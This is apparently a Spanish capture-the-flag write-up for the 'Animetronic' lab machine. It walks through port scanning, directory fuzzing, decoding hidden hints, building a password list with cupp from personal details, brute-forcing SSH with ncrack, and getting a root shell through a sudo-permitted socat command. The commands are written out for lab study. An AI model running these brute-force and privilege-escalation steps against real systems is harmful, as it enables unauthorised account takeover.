Enumeramos puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.35
❯ nmap -sCV -p22,80 -oN 02-targeted.txt 192.168.1.35
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-08 14:32 -03
Nmap scan report for 192.168.1.35
Host is up (0.00028s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 59:eb:51:67:e5:6a:9e:c1:4c:4e:c5:da:cd:ab:4c:eb (ECDSA)
|_ 256 96:da:61:17:e2:23:ca:70:19:b5:3f:53:b5:5a:02:59 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Animetronic
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.72 secondsEnumeramos directorios con ffuf (anidados):
❯ ffuf -u 'http://192.168.1.35/FUZZ' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
...
img [Status: 301, Size: 310, Words: 20, Lines: 10, Duration: 440ms]
staffpages [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 12ms]
...
❯ ffuf -u 'http://192.168.1.35/staffpages/FUZZ' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
...
new_employees [Status: 200, Size: 159577, Words: 682, Lines: 728, Duration: 17ms]
...new_employees es una imagen JPG cuyo comentario EXIF contiene una cadena codificada:
❯ exiftool new_employees.jpg
...
Comment : page for you michael : ya/HnXNzyZDGg8ed4oC+yZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo=
...
❯ echo "ya/HnXNzyZDGg8ed4oC+yZ9vybnigL7Jr8SxyZTJpcmQx53Xnwo=" | base64 -d
ɯǝssɐƃǝ‾ɟoɹ‾ɯıɔɥɐǝןEl texto (invertido) apunta a message_for_michael. Lo visitamos y encontramos una nota que menciona un archivo de información personal:
Hi Michael
Sorry for this complicated way of sending messages between us.
This is because I assigned a powerful hacker to try to hack
our server.
By the way, try changing your password because it is easy
to discover, as it is a mixture of your personal information
contained in this file
personal_info.txt
❯ curl http://192.168.1.35/staffpages/personal_info.txt
name: Michael
age: 27
birth date: 19/10/1996
number of children: 3 " Ahmed - Yasser - Adam "
Hobbies: swimmingGeneramos un diccionario personalizado con cupp a partir de esos datos:
❯ sudo cupp -i
___________
cupp.py! # Common
\ # User
\ ,__, # Passwords
\ (oo)____ # Profiler
(__) )\
||--|| * [ Muris Kurgas | j0rgan@remote-exploit.org ]
[ Mebus | https://github.com/Mebus/]
[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)
> First Name: michael
> Surname:
> Nickname:
> Birthdate (DDMMYYYY): 19101996
> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):
> Child's name:
> Child's nickname:
> Child's birthdate (DDMMYYYY):
> Pet's name:
> Company name:
> Do you want to add some key words about the victim? Y/[N]: Y
> Please enter the words, separated by comma. [i.e. hacker,juice,black], spaces will be removed: swimming,ahmed,yasser,adam
> Do you want to add special chars at the end of words? Y/[N]:
> Do you want to add some random numbers at the end of words? Y/[N]:
> Leet mode? (i.e. leet = 1337) Y/[N]:
[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to michael.txt, counting 2516 words.
> Hyperspeed Print? (Y/n) :
[+] Now load your pistolero with michael.txt and shoot! Good luck!Hacemos fuerza bruta contra SSH con ncrack:
❯ ncrack -v --user michael -P michael.txt 192.168.1.35:22
Starting Ncrack 0.7 ( http://ncrack.org ) at 2024-03-09 14:52 -03
Discovered credentials on ssh://192.168.1.35:22 'michael' 'leahcim1996'
ssh://192.168.1.35:22 finished.
Discovered credentials for ssh on 192.168.1.35 22/tcp:
192.168.1.35 22/tcp ssh: 'michael' 'leahcim1996'
Ncrack done: 1 service scanned in 447.00 seconds.
Probes sent: 651 | timed-out: 0 | prematurely-closed: 224
Ncrack finished.Iniciamos sesión como michael y, en el home de henry, hallamos la primera flag y una nota que apunta (en base64) al archivo con su contraseña:
michael@animetronic:/home/henry$ cat Note.txt
if you need my account to do anything on the server,
you will find my password in file named
aGVucnlwYXNzd29yZC50eHQK❯ echo "aGVucnlwYXNzd29yZC50eHQK" | base64 -d
henrypassword.txt
michael@animetronic:/home/henry$ find / -name henrypassword.txt 2>/dev/null
/home/henry/.new_folder/dir289/dir26/dir10/henrypassword.txtCon esa contraseña iniciamos sesión como henry y revisamos sudo -l:
henry@animetronic:~$ sudo -l
Matching Defaults entries for henry on animetronic:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User henry may run the following commands on animetronic:
(root) NOPASSWD: /usr/bin/socatPodemos ejecutar socat como root, lo que aprovechamos para obtener una shell privilegiada:
henry@animetronic:~$ sudo socat stdin exec:/bin/bash
whoami
rootObtenemos nuestra bandera.
Fin.